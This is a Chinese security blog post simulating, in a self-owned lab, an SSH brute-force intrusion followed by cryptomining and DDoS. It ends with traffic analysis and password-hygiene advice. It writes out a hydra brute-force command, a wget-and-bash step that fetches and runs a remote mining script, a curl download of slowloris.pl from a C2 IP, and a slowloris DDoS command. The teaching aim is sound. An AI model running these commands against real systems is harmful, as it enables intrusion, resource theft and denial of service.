模拟挖矿黑客攻击过程

本文作者：Cherishao（信安之路应急小组组长）

眨眼间，2018 年的上半年就这样飞逝而过，在上半年的工作中，接触最常规的安全事件就是服务器或者办公主机被远控作为肉鸡挖矿来获取利益或者对其它网站进行 DDoS 攻击，今天分享一下如何利用 Linux 常规的 SSH 弱口令爆破 Linux 服务器并利用该服务器进行挖矿及对其它网站进行 DDoS 攻击，攻击即分析流程较为简单，如有不适之处，欢迎斧正。

实验环境

使用的 Linux 服务器及搭建的站点源码及使用的域名如下：

Linux: Kali 2.0

IP：192.168.95.132

网站部署源码：DiscuzX.7z

部署工具：phpstudy

Website Domain: Cherishao.com

使用的工具如下：

SSH爆破：hydra-8.1-windows

远程终端管理：X term

分析工具：Wireshark

网站搭建

网上下载 DiscuzX 源码，利用 PHPStudy 快速建站工具，将其源码放在其 WWW 目录下，启动即可（阅读 README.md 文档）。

域名绑定

将自己的 IP 地址，绑定在自己注册的域名，添加解析记录即可：

攻击流程

利用安全工具对指定的平台服务器（该服务器提供了常见的网络服务，例如 Web 服务、终端服务等）进行 SSH 暴力破解攻击。攻击流程设计如下：

SSH 爆破

通过分析扫描目标站点（IP地址：192.168.95.132）服务器,发现服务器开启 SSH22 端口、操作系统类型为 Linux。

利用 hydra 进行 SSH 爆破获取服务器权限:

hydra -l root -P 字典 -V ssh://192.168.95.132

通过暴力破解得到的 (root/123456) 进入服务器：

连接上服务器后，运行脚本获取远端挖矿程序。服务器当前状态：

利用服务器挖矿

获取安装脚本

wget --no-check-certificate https://www.yiluzhuanqian.com/soft/script/mservice_2_5.sh -O mservice.sh

执行脚本开始挖矿

sudo bash mservice.sh 10014 #该ID可替换为自己的用户ID

服务器挖矿时的 CPU 状态（CPU 飙升到 96%）：

DDoS 攻击

利用该服务器对(网站: Cherishao.com ) DDoS 攻击。

从 C2 服务器，获取 DDoS shell

Curl http://173.82.235.146/slowloris.pl

对该站点进行 DDos 攻击

slowloris.pl -dns cherishao.com -timeout 1 - num 1000

网站正常运行时状态：

Ddos 攻击后网站状态：

通信特征流分析

利用 Wireshark 抓包分析

挖矿数据流分析

从上图的通信数据流中，我们可以发现挖矿者使用的钱包地址:

42d4D8pASAWghyTmUS8a9yZyErA4WB18TJ6Xd2rZt9HBio2aPmAAVpHcPM8yoDEYD9Fy7eRvPJhR7SKFyTaFbSYCNZ2t3ik

代理：

“XMRig/2.5.2”

Xig 代理特征

DDoS 数据流分析

通过分析发现对Cherishao.com网站的大量DNS请求包：

总结及相关附件

总结

近些年，新出现了众多入侵系统的手法，像 Apache Struts2 漏洞利用、Hadoop Yarn REST API未授权漏洞利用，但是古老的 SSH 暴力破解攻击手段不仅没有消亡，反而愈演愈烈。

本文通过这样一个简单的设计，主要是想传达：一但 Hacker 取得了我们系统的权限，他可以做比较多的事情，信息窃取，数据破坏，对外攻击等诸多对我们不利的事情，在日常的工作及生活中请加强密码防护策略的重视，加强自身安全意识。

相关附件

https://pan.baidu.com/s/1ZkrmAmbNUHve6MW7cCQCNQ 密码：mp3l

参考链接

SSH 暴力破解趋势

http://www.freebuf.com/articles/paper/177473.html